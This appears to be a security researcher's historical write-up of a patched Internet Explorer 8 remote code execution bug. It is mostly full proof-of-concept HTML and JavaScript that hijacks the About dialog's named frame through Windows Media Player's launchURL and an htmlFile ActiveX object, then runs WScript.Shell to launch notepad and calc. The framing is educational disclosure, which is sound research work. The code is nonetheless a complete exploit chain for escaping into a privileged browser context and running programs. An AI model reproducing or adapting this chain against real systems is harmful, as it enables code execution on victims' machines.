IE8 RCE via About Dialog _unspecifiedFrame (IE8 Variation)

This is the IE8 variation of the _unspecifiedFrame About dialog attack. The IE7 version used a direct window.open to hijack the frame; IE8 blocked that approach, so the method switches to Windows Media Player’s launchURL which could navigate a named window. Once inside, a cross-origin technique (WOOBR #969594) using an htmlFile ActiveX object and setTimeout provides access back to the About dialog’s elevated context.

<!-- index.html: uses WMP launchURL instead of window.open to bypass IE8's restriction -->
<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" width="1" height="1"></object>
<script language="JavaScript">
function WMP_launchURL(url, windowName)
{
    document.all.oWMP.launchURL(url +'&&'+ windowName);
}

var alreadyLoaded = false;
function changeUnspecifiedFrameLocation()
{
    if (alreadyLoaded) return;
    if (!win_unspecifiedFrame)
    {
        try {
            win_unspecifiedFrame = window.open("","_unspecifiedFrame")
        }
        catch(e)
        {
            alreadyLoaded = true;
            clearInterval(interval_Wait_for_Window);
            WMP_launchURL(currentDir + 'bridge_to_exploit.html', '_unspecifiedFrame');
        }
    }
    else
    {
        alreadyLoaded = true;
        clearInterval(interval_Wait_for_Window);
        WMP_launchURL(currentDir + 'bridge_to_exploit.html', '_unspecifiedFrame');
    }
}
var currentDir = location.href.substring(0,location.href.lastIndexOf('/')+1);
var win_unspecifiedFrame = null;

var newTridentThread = new ActiveXObject('htmlFile');
var interval_Wait_for_Window = newTridentThread.parentWindow.setInterval('changeUnspecifiedFrameLocation()',3000);
newTridentThread.parentWindow.changeUnspecifiedFrameLocation = changeUnspecifiedFrameLocation;
</script>

<!-- bridge_to_exploit.html: uses htmlFile + setTimeout to re-load the About dialog URL in our context -->
<script language="JavaScript">
myAx = new ActiveXObject('htmlFile');
myAx.Script.setTimeout('window.name="ALFAJOR";window.open("res://ieframe.dll/aboutXP.dlg","ALFAJOR")');
function injectCodeInDLG()
{
    myAx.Script.win = opener;
    myAx.Script.setTimeout('win.execScript(\'var Shell = new ActiveXObject("WScript.Shell");Shell.Run("notepad");try{Shell.Run("calc");};catch(e){}\')');
}
setTimeout('injectCodeInDLG()',2000);
</script>

The About dialog still requires a user click on the copyright link. On Vista Protected Mode only Notepad opens; on XP both Notepad and Calculator launch. The fix was the same as IE7: remove the named window from the About dialog’s link navigation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.